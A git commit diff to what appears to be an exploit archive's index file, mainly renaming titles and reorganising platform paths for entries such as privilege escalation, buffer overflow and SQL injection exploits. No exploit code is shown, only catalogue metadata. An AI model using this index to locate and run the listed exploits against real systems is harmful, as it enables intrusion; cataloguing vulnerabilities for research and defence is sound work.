DB: 2017-01-31

39 new exploits OpenSSL 1.1.0 - Remote Client Denial of Service CDRTools CDRecord 2.0 - Mandrake Privilege Escalation CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation BitchX 1.0c19 - Privilege Escalation (suid?) Apache 1.3.31 (mod_include) - Local Buffer Overflow BitchX 1.0c19 - Privilege Escalation Apache 1.3.31 mod_include - Local Buffer Overflow AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation Debian 2.2 - /usr/bin/pileup Privilege Escalation Debian 2.2 /usr/bin/pileup - Privilege Escalation Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation IBM AIX 5.3.0 - setlocale() Privilege Escalation IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit FreeBSD 6x/7 protosw Kernel - Privilege Escalation PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow (Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation (Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit) Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit) FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit FreeBSD 6.4 - Netgraph Privilege Escalation PHP 5.4.3 (Windows x86 Polish) - Code Execution Apache (Mod_Auth_OpenID) - Session Stealing Apache Mod_Auth_OpenID - Session Stealing cPanel 5.0 - Openwebmail Privilege Escalation cPanel 5.0 - 'Openwebmail' Privilege Escalation Apache 2.0.4x (mod_php) - File Descriptor Leakage (1) Apache 2.0.4x (mod_php) - File Descriptor Leakage (2) Apache 2.0.4x mod_php - File Descriptor Leakage (1) Apache 2.0.4x mod_php - File Descriptor Leakage (2) Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3) Apache 2.0.4x mod_perl - File Descriptor Leakage (3) cPanel 5-9 - Privilege Escalation cPanel 5 < 9 - Privilege Escalation Apache 1.3.x (mod_include) - Local Buffer Overflow Apache 1.3.x mod_include - Local Buffer Overflow IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities IBM AIX 5.x - 'Diag' Privilege Escalation Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation Amanda 3.3.1 - amstar Command Injection Privilege Escalation Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1) Deepin Linux 15 - lastore-daemon Privilege Escalation Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1) Deepin Linux 15 - 'lastore-daemon' Privilege Escalation Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040) Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046) Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit) Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit) Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062) MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit) Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit) Apache CouchDB 2.0.0 - Local Privilege Escalation Apache CouchDB 2.0.0 - Privilege Escalation Vesta Control Panel 0.9.8-16 - Local Privilege Escalation Vesta Control Panel 0.9.8-16 - Privilege Escalation Systemd 228 - Privilege Escalation (PoC) Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC) Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC) Apache 1.3.x (mod_mylo) - Remote Code Execution Apache 1.3.x mod_mylo - Remote Code Execution Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032) Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2) Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow 3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield) Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit 3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl) SapLPD 6.28 (Windows x86) - Remote Buffer Overflow Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit Apache (mod_proxy) - Reverse Proxy Exposure (PoC) Apache mod_proxy - Reverse Proxy Exposure (PoC) Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1) Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass Apache (mod_wsgi) - Information Disclosure Apache mod_wsgi - Information Disclosure Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit phpGraphy 0.9.12 - Privilege Escalation / Commands Execution PEAR 1.9.0 - Multiple Remote File Inclusion PHP PEAR 1.9.0 - Multiple Remote File Inclusion Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload Radisys MRF - Command Injection PHP PEAR 1.10.1 - Arbitrary File Download Caregiver Script 2.57 - SQL Injection Auction Script 6.49 - SQL Injection Itech B2B Script 4.28 - SQL Injection Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection Itech Dating Script 3.26 - SQL Injection Itech Freelancer Script 5.13 - SQL Injection Itech Multi Vendor Script 6.49 - SQL Injection Itech News Portal Script 6.28 - SQL Injection Itech Real Estate Script 3.12 - SQL Injection PHP Product Designer Script - Arbitrary File Upload PHP Logo Designer Script - Arbitrary File Upload Video Sharing Script 4.94 - SQL Injection HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection Itech Dating Script 3.26 - 'send_gift.php' SQL Injection Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection
2017-01-31 05:01:15 +00:00 · 2017-01-31 05:01:15 +00:00 · bf6526a40b
commit bf6526a40b
parent 6df10a3616
41 changed files with 1323 additions and 70 deletions
--- a/files.csv
+++ b/files.csv
@ -5348,13 +5348,14 @@ id,file,description,date,author,platform,type,port
 41163,platforms/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos,0
 41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
 41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
 41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
 15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0
-31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0
+31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0
 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0
 52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
@ -5395,7 +5396,7 @@ id,file,description,date,author,platform,type,port
 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
-205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0
+205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
@ -5484,8 +5485,8 @@ id,file,description,date,author,platform,type,port
 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0
 560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0
 579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
-586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0
+586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0
-587,platforms/linux/local/587.c,"Apache 1.3.31 (mod_include) - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
+587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
 591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0
 600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0
 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0
@ -5500,7 +5501,7 @@ id,file,description,date,author,platform,type,port
 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0
 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0
 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0
-701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
+701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0
 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
@ -5596,7 +5597,7 @@ id,file,description,date,author,platform,type,port
 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0
 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0
-1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
+1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup - Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
 1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0
 1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0
 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)",2004-12-24,"Marco Ivaldi",linux,local,0
@ -5770,7 +5771,7 @@ id,file,description,date,author,platform,type,port
 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0
 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0
-3451,platforms/windows/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",windows,local,0
+3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0
 3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0
 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
@ -5812,9 +5813,9 @@ id,file,description,date,author,platform,type,port
 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0
 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0
 3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0
-3888,platforms/windows/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
+3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0
 3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0
-3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0
+3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0
 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0
 3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0
 4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0
@ -5834,7 +5835,7 @@ id,file,description,date,author,platform,type,port
 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0
-4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
+4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0
 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0
 4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0
@ -5866,7 +5867,7 @@ id,file,description,date,author,platform,type,port
 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0
 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
-4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - setlocale() Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
+4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0
 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0
 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
@ -5958,7 +5959,7 @@ id,file,description,date,author,platform,type,port
 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
-7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
+7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0
 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0
@ -6111,7 +6112,7 @@ id,file,description,date,author,platform,type,port
 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0
 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0
 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0
-8799,platforms/windows/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,windows,local,0
+8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,win_x86,local,0
 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0
 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0
 8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0
@ -6346,7 +6347,7 @@ id,file,description,date,author,platform,type,port
 11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0
 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
-11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
+11112,platforms/win_x86/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",win_x86,local,0
 11139,platforms/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
@ -6422,7 +6423,7 @@ id,file,description,date,author,platform,type,port
 12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0
 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0
 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0
-12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
+12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
@ -6694,7 +6695,7 @@ id,file,description,date,author,platform,type,port
 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
-40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
+40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
 16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
@ -6771,7 +6772,7 @@ id,file,description,date,author,platform,type,port
 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0
 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0
 16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0
-16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
+16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Privilege Escalation",2011-03-10,zx2c4,bsd,local,0
 16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow",2011-03-12,"C4SS!0 G0M3S",windows,local,0
 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Buffer Overflow",2011-03-14,Rh0,windows,local,0
 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local,0
